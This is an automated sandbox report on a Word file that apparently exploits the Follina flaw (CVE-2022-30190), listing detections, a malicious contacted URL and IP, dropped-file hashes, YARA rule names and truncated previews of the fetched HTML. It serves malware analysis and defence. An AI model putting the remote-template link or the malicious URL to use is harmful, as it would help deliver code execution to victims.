      Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS Memory2
      System Information Discovery      		Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth2
      Non-Application Layer Protocol      		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration13
      Application Layer Protocol      		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Binary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled Transfer2
      Ingress Tool Transfer      		SIM Card SwapCarrier Billing Fraud

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      qoIZSkdejM.docx35%VirustotalBrowse
      qoIZSkdejM.docx23%MetadefenderBrowse
      qoIZSkdejM.docx45%ReversingLabsDocument-Word.Exploit.CVE-2022-30190
      qoIZSkdejM.docx100%AviraW97M/Dldr.Agent.G1

      Dropped Files

      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\456[1].htm100%AviraJS/CVE-2022-30190.G
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8EBCBBE8.htm100%AviraJS/CVE-2022-30190.G
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F8D236.htm100%AviraJS/CVE-2022-30190.G

      Unpacked PE Files

      No Antivirus matches

      Domains

      SourceDetectionScannerLabelLink
      www.malwarejake.com0%VirustotalBrowse

      URLs

      SourceDetectionScannerLabelLink
      https://www.malwarejake.com/456.html0%VirustotalBrowse
      https://www.malwarejake.com/456.html100%Avira URL Cloudmalware
      https://www.malwarejake.com/456.htmlyX0%Avira URL Cloudsafe

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      www.malwarejake.com
      		143.198.109.79
      		truetrueunknown

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      https://www.malwarejake.com/456.htmltrue
      • 0%, Virustotal, Browse
      • Avira URL Cloud: malware
      		unknown

      URLs from Memory and Binaries

      NameSourceMaliciousAntivirus DetectionReputation
      https://www.malwarejake.com/456.htmlyX~WRF{6D6953D1-CE9C-4DB1-815E-63A7D4CF5844}.tmp.0.drtrue
      • Avira URL Cloud: safe
      		unknown

      World Map of Contacted IPs

      • No. of IPs < 25%
      • 25% < No. of IPs < 50%
      • 50% < No. of IPs < 75%
      • 75% < No. of IPs

      Public IPs

      IPDomainCountryFlagASNASN NameMalicious
      143.198.109.79
      		www.malwarejake.comUnited States
      		15557LDCOMNETFRtrue

      General Information

      Joe Sandbox Version:35.0.0 Citrine
      Analysis ID:686090
      Start date and time:2022-08-18 08:26:02 +02:00
      Joe Sandbox Product:CloudBasic
      Overall analysis duration:0h 6m 33s
      Hypervisor based Inspection enabled:false
      Report type:light
      Sample file name:qoIZSkdejM (renamed file extension from none to docx)
      Cookbook file name:defaultwindowsofficecookbook.jbs
      Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
      Number of analysed new started processes analysed:10
      Number of new started drivers analysed:1
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:0
      Technologies:
      • HCA enabled
      • EGA enabled
      • HDC enabled
      • AMSI enabled
      Analysis Mode:default
      Analysis stop reason:Timeout
      Detection:MAL
      Classification:mal96.expl.evad.winDOCX@1/18@15/1
      EGA Information:Failed
      HDC Information:Failed
      HCA Information:
      • Successful, ratio: 100%
      • Number of executed functions: 0
      • Number of non-executed functions: 0
      Cookbook Comments:
      • Adjust boot time
      • Enable AMSI
      • Found Word or Excel or PowerPoint or XPS Viewer
      • Attach to Office via COM
      • Scroll down
      • Close Viewer

      Warnings

      • Exclude process from analysis (whitelisted): mrxdav.sys, dllhost.exe, rundll32.exe
      • TCP Packets have been reduced to 100
      • Report size getting too big, too many NtQueryAttributesFile calls found.

      Simulations

      Behavior and APIs

      No simulations

      Joe Sandbox View / Context

      IPs

      No context

      Domains

      No context

      ASNs

      No context

      JA3 Fingerprints

      No context

      Dropped Files

      No context

      Created / dropped Files

      C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-CNRY.FSD

      Download File
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:data
      Category:dropped
      Size (bytes):131072
      Entropy (8bit):0.28873688711451273
      Encrypted:false
      SSDEEP:48:I36SRBz0/O33Oq3OOeOplGOmjn3YOh8Qys1gOX7FBOX0GROXX3OXJrPOXvTO4OwR:KnLz765g0GWXsVEmyrySH
      MD5:28F73E1D7481A925E37DD40FBD66ADB5
      SHA1:C83C1651B1CE7CA06214D536C733A4BE288D1035
      SHA-256:A32B295015C9D2E54D7B85D64FBC2B512E28F3696291F1F7EEA9CA1DE51366CE
      SHA-512:233C0AE685D4F96D9521BBF1BBC566AA44F97302D3A5E84F35564FE740579CE13E5FD396E2A8A5558009D09F59DC620293CC9552A7B7F5DBEDE163178930A584
      Malicious:false
      Reputation:low
      Preview:......M.eFy...z?..6a.;E.... ,TS,...X.F...Fa.q.................................c/@...4...........q:....+C.G$......A...................................E...............................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@....p..G...s.q.Q9G..a`..qb.....p..G.........J..R.w.ps............................................................................................................................................................................................................................................................................................................................................................................................................................

      C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{B8717A19-9829-40D6-A026-8F5ABC06FCCF}.FSD

      Download File
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:data
      Category:dropped
      Size (bytes):131072
      Entropy (8bit):0.6724512997201999
      Encrypted:false
      SSDEEP:768:X4VM1AI/x/3bC/pmqw4gdm+2YKyiIt1m+2YKyiIttm+2YKyiItIm+2YKyiI:XnRzbo
      MD5:77F6420775F752B526D099B514984A9E
      SHA1:DBD33E40BE3851E00BD269864C3395B4B42AC961
      SHA-256:BCFED7836FE35909AD9DDBF5DCD4D9E862A623583BF6550DFD263AA243A5CB30
      SHA-512:0C79EB825AA45F69CC6277B8BE18C720F40B965180B2DB944230EFB599D6E95DC5FCCCDFD648CD11167BEAD6FE58E1AA5D759D39D8EC0E3F173E3562F9C83413
      Malicious:false
      Reputation:low
      Preview:......M.eFy...z.Jtt..CC.{.8B..kS,...X.F...Fa.q.............................zv...J..{............G..M...N..(..K...S...................................W...............................x...x...x...x..*............................................................................................................................................................................................................................................................................................................................zV.......... ..@....p..G...s.q.Q9G..a`..qb.....p..G.....5.2A....................................................................................................................................................................................................................................................................................................................................................................................................................................

      C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSF-CTBL.FSF

      Download File
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:data
      Category:dropped
      Size (bytes):114
      Entropy (8bit):3.959476246683456
      Encrypted:false
      SSDEEP:3:yVlgsRlzyl8jFYiRzhpTXrCwkAjfct276:yPblzyl6FYiRmwkAbct22
      MD5:42A4C1F97C02E4455D7124209DAD82D6
      SHA1:35E02941D6F93B89612B9138A4158B3E73722DC7
      SHA-256:2DF9425A9498D48647078C0374EFE91BDD7AAD2A5295E512F8C73F053BF5D5ED
      SHA-512:16D712CBFAC51BC908683F3AA925CE1383FB19529B4B25E600FC59B105D75A9F1E2D88C1631D40D7154A6006DF8028409208E3A240EA7DB6307FBB75DB7A73C6
      Malicious:false
      Reputation:low
      Preview:..H..@....b..q....]F.S.D.-.{.B.8.7.1.7.A.1.9.-.9.8.2.9.-.4.0.D.6.-.A.0.2.6.-.8.F.5.A.B.C.0.6.F.C.C.F.}...F.S.D..

      C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD

      Download File
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:data
      Category:dropped
      Size (bytes):131072
      Entropy (8bit):0.28691484699157094
      Encrypted:false
      SSDEEP:48:I3taRBG+81ZCMG4gaBTMhUfkgMfPlQwrnerk9H:KtaLXKNlTHMfPldMqH
      MD5:3ACA8973093C12C413A9EE1A54F08EC9
      SHA1:CECF24CEEEE35496AFC258BD51AEE8A015CE5860
      SHA-256:3B541FD09566960CD44EBD7FE9636389A0D32B051BC361F6BEABC7C352F8A70B
      SHA-512:0E37BB3424786D4165C36509BD5BFA179DFF8BE3A8AFE3F514C038F1F49BE48EDD10A23A07911E3CDF2295EF6513D96967555695557BC6CA72DB596338066651
      Malicious:false
      Reputation:low
      Preview:......M.eFy...zP0J..[.I..:...S,...X.F...Fa.q..............................b.Y.J....iZ.U.........t5..d.I....l(fp.A...................................E...............................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@....p..G...s.q.Q9G..a`..qb.....p..G.........J..R.w.ps............................................................................................................................................................................................................................................................................................................................................................................................................................

      C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-{C6D9626B-042E-41CB-8D4F-7A4C3803912A}.FSD

      Download File
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:data
      Category:dropped
      Size (bytes):131072
      Entropy (8bit):0.22069206926972237
      Encrypted:false
      SSDEEP:48:I3qf0TUUrBrME5BFdkY9oso/mSpM/oNP/oNh:K8SUC55Gpq
      MD5:7C3F381F7EBADADFC1D6D02020D4A9C2
      SHA1:98C49943B9F8F74B74CCD81F03DE992B38B71A4C
      SHA-256:EE92EA31846F8A102B1F1ACA826FAD2779FA061390888EE22B6E4638C4EBF384
      SHA-512:35712E6451D7818EE4DAFF5D03290E9991E9B78D83B0E74C3F7E229D5C51688E6C6CBC4EADFFA12F4FED6B755E19A7AB443470FEF497C0CFD472F627B2849D61
      Malicious:false
      Reputation:low
      Preview:......M.eFy...z...q.#L..Tg../.S,...X.F...Fa.q.............................b.?...N.`.Kz.Bw..........&.L.E.YO.L.O.P>..................................PB...............................x...x...x...x..........+....................................................................................................................................................................................................................................................................................................................zV.......... ..@....p..G...s.q.Q9G..a`..qb.....p..G...|.u-.u.A...W"U.............................................................................................................................................................................................................................................................................................................................................................................................................................

      C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSF-{0E1EEE64-E8C6-4E2A-9759-63CF07FD8988}.FSF

      Download File
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:data
      Category:dropped
      Size (bytes):114
      Entropy (8bit):3.9934613605512386
      Encrypted:false
      SSDEEP:3:yVlgsRlzq7lU1SLNyeSldhttkL0WFPFu276:yPblzaU7jBEz9Fu22
      MD5:3E7A15E942D05782E9E43891ECECF90C
      SHA1:F90804676119952EB42BBB590F7D6869544B43CE
      SHA-256:95F6BA028B9748336838FC2D20CCB266CAA743CD8B6FF5044745D0651237B505
      SHA-512:7C64CC766B4CBDA1EC0F61EDEC8EEDF56BA4E243044543C1275C025613CC8B6CC4B46213DD843E31FC284385B9AC34E91BA204E65FD4F0A1A55256A3AE44C2B7
      Malicious:false
      Reputation:low
      Preview:..H..@....b..q....]F.S.D.-.{.C.6.D.9.6.2.6.B.-.0.4.2.E.-.4.1.C.B.-.8.D.4.F.-.7.A.4.C.3.8.0.3.9.1.2.A.}...F.S.D..

      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\456[1].htm

      Download File
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:HTML document, ASCII text, with very long lines, with CRLF line terminators
      Category:downloaded
      Size (bytes):7056
      Entropy (8bit):1.1561718807594425
      Encrypted:false
      SSDEEP:24:0Wr/HdlR1N7cGkLnPKZ2kt8HqCkEvNu4SYMW:0Wr/ddUPyNnEFu4SPW
      MD5:B92EE400BE1F2612B4138031DFC5881E
      SHA1:322065E52393CC668A77A0EB76F33EEC191CC668
      SHA-256:8918EDE0A38D40EE0B89028819DCAAC6BB73D2280AD88EA2E1D0A42FD7101AA6
      SHA-512:B33D22C2C3951BF8403E3B8FB13BEB8614BF8EF743344BA944D119FE1DD67D61BDEB78964639B99346E6B8045E517A023FECB8A29665E31F26E70BDCC6B9732B
      Malicious:true
      Yara Hits:
      • Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\456[1].htm, Author: Nasreddine Bencherchali, Christian Burkard
      • Rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22, Description: Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\456[1].htm, Author: Tobias Michalski, Christian Burkard
      • Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\456[1].htm, Author: Joe Security
      Antivirus:
      • Antivirus: Avira, Detection: 100%
      Reputation:low
      IE Cache URL:https://www.malwarejake.com/456.html
      Preview:<!doctype html>..<html lang="en">..<body>..<script>..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAA

      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8EBCBBE8.htm

      Download File
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:HTML document, ASCII text, with very long lines, with CRLF line terminators
      Category:dropped
      Size (bytes):7056
      Entropy (8bit):1.1561718807594425
      Encrypted:false
      SSDEEP:24:0Wr/HdlR1N7cGkLnPKZ2kt8HqCkEvNu4SYMW:0Wr/ddUPyNnEFu4SPW
      MD5:B92EE400BE1F2612B4138031DFC5881E
      SHA1:322065E52393CC668A77A0EB76F33EEC191CC668
      SHA-256:8918EDE0A38D40EE0B89028819DCAAC6BB73D2280AD88EA2E1D0A42FD7101AA6
      SHA-512:B33D22C2C3951BF8403E3B8FB13BEB8614BF8EF743344BA944D119FE1DD67D61BDEB78964639B99346E6B8045E517A023FECB8A29665E31F26E70BDCC6B9732B
      Malicious:true
      Yara Hits:
      • Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8EBCBBE8.htm, Author: Nasreddine Bencherchali, Christian Burkard
      • Rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22, Description: Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8EBCBBE8.htm, Author: Tobias Michalski, Christian Burkard
      • Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8EBCBBE8.htm, Author: Joe Security
      Antivirus:
      • Antivirus: Avira, Detection: 100%
      Reputation:low
      Preview:<!doctype html>..<html lang="en">..<body>..<script>..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAA

      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F8D236.htm

      Download File
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:HTML document, ASCII text, with very long lines, with CRLF line terminators
      Category:dropped
      Size (bytes):7056
      Entropy (8bit):1.1561718807594425
      Encrypted:false
      SSDEEP:24:0Wr/HdlR1N7cGkLnPKZ2kt8HqCkEvNu4SYMW:0Wr/ddUPyNnEFu4SPW
      MD5:B92EE400BE1F2612B4138031DFC5881E
      SHA1:322065E52393CC668A77A0EB76F33EEC191CC668
      SHA-256:8918EDE0A38D40EE0B89028819DCAAC6BB73D2280AD88EA2E1D0A42FD7101AA6
      SHA-512:B33D22C2C3951BF8403E3B8FB13BEB8614BF8EF743344BA944D119FE1DD67D61BDEB78964639B99346E6B8045E517A023FECB8A29665E31F26E70BDCC6B9732B
      Malicious:true
      Yara Hits:
      • Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F8D236.htm, Author: Nasreddine Bencherchali, Christian Burkard
      • Rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22, Description: Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F8D236.htm, Author: Tobias Michalski, Christian Burkard
      • Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F8D236.htm, Author: Joe Security
      Antivirus:
      • Antivirus: Avira, Detection: 100%
      Reputation:low
      Preview:<!doctype html>..<html lang="en">..<body>..<script>..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAA

      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{6D6953D1-CE9C-4DB1-815E-63A7D4CF5844}.tmp

      Download File
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:Composite Document File V2 Document, Cannot read section info
      Category:dropped
      Size (bytes):5120
      Entropy (8bit):2.1106765232664424
      Encrypted:false
      SSDEEP:24:rYvXkbK/FPifnQNSLNni0nQdPi4ggooULNniT:rYfkm9cnQSpi0nQdfWFpi
      MD5:D0E8EEB4350D366F88AB89E9AB7BC0BE
      SHA1:3C96C82FD16422901C26C1966F5726F73DA6DE34
      SHA-256:46C37C7B7958325F3882CE70315C10B0FDBB912404925FAFB893AB765707A02B
      SHA-512:FA4FFC253836E0712FAA0C7B6CEB81349895313767F0BB14A97B2D35FF8637D6FA1FE38803A64663FF17DA9172951937BA1966C040BB5D2DF4830D54B96DE24B
      Malicious:false
      Reputation:low
      Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{AA6E250D-FB32-4807-A558-7E6F31821338}.tmp

      Download File
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:data
      Category:dropped
      Size (bytes):1536
      Entropy (8bit):0.7710450912559451
      Encrypted:false
      SSDEEP:3:5lsl4/I5lNVRIYk/lElXlAPlMOau+2lT8M1nRF5Zfdkl5XHlRtp/gdl/ABdllqPe:olgI5lNcYWeuPa+ejJoYB4PxZUtLsmN
      MD5:DF555F2BD2F7953B785FBD5C2EC880ED
      SHA1:EC5BBE67F462283F60964E804FEA21BE05DEDE5E
      SHA-256:B5E66DC74C4F74A231454D7843C6A8E9B6DFF18E51AF4590CC460FE9E5373E6D
      SHA-512:E2C31A4890ECD7B809D27DF505BAD97BD9B5BF7A7F5900C07F81705221FFCD13F949A57E8DBC5D07E025FE2778DC37F75346D24CEE342C1316FFC493632C95E4
      Malicious:false
      Reputation:low
      Preview:..L.I.N.K. .h.t.m.l.f.i.l.e. .".h.t.t.p.s.:././.w.w.w...m.a.l.w.a.r.e.j.a.k.e...c.o.m./.4.5.6...h.t.m.l.!.". .".". .\.p. .\.f. .0..... . .........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................j....U

      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{C04F3D99-F9B9-4448-A2CE-FCD4E5583AFE}.tmp

      Download File
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:data
      Category:dropped
      Size (bytes):1024
      Entropy (8bit):0.05390218305374581
      Encrypted:false
      SSDEEP:3:ol3lYdn:4Wn
      MD5:5D4D94EE7E06BBB0AF9584119797B23A
      SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
      SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
      SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
      Malicious:false
      Reputation:high, very likely benign file
      Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

      C:\Users\user\AppData\Local\Temp\{6C7612EA-A508-466F-8495-DC8EC1079B60}

      Download File
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:data
      Category:dropped
      Size (bytes):131072
      Entropy (8bit):0.025595998137779664
      Encrypted:false
      SSDEEP:6:I3DPcXKq3u/FvxggLRBJgNkBB/RDRXv//4tfnRujlw//+GtluJ/eRuj:I3DPAsTgGB/R1vYg3J/
      MD5:1DE094F8CC783FB8C79C8796F6DEFE80
      SHA1:7D012B58C1F576912E30B7626563E66504C45FEA
      SHA-256:05415D3ECB94C1E9A41DF6598194681CA259A883B702D73F24A9C14C3B60128A
      SHA-512:D8D4EFCFBE62216E78D57BEF7531FEB8C7433602E169EED5FB3B1903E33F6A0EC32E0D15D4D017719DF45B4906D79D01E6DC990E0E149E01F61EAF8C59498815
      Malicious:false
      Preview:......M.eFy...zP0J..[.I..:...S,...X.F...Fa.q..............................8,..6H...Sl7CG.........t5..d.I....l(fp.....................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

      C:\Users\user\AppData\Local\Temp\{9AEF27EA-6FDF-4FB9-8E04-D287C95AF429}

      Download File
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:data
      Category:dropped
      Size (bytes):131072
      Entropy (8bit):0.025470567096111188
      Encrypted:false
      SSDEEP:6:I3DPchixVvxggLRNA40ltRXv//4tfnRujlw//+GtluJ/eRuj:I3DP2ixZMTvYg3J/
      MD5:314C04BEA9F8999637A6874D071429EB
      SHA1:004A2ECCE0788F2ACA8ADFD7725608B8AAAFA44A
      SHA-256:DAA04F38CD32929596048F14FD986658824430CD0B025D6D4C7074E29D57610E
      SHA-512:38DD64E7172A9CC0BFE9C8EECCE3DA1AE4CA9FFD8216A0E74E51979161B00647A02109020611C06F13747C9C944F763B71D2164F5DED9AB16189786DBD919DCA
      Malicious:false
      Preview:......M.eFy...z?..6a.;E.... ,TS,...X.F...Fa.q...............................l..F....0<U........q:....+C.G$..........................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

      Download File
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:ASCII text, with CRLF line terminators
      Category:dropped
      Size (bytes):72
      Entropy (8bit):4.786273488348122
      Encrypted:false
      SSDEEP:3:bDuMJlMKpO1d2mxWfOO1d2v:bCAm
      MD5:22FF1DED7C768389EA5A0012AD7FFDB7
      SHA1:3C6A3F7DCF0A4DF09F1C6649D44517042797A9FC
      SHA-256:4B03CCDC4AF57995C882CEE2F0FF79078A3521735DA3976B07F3DF4A2BFB658D
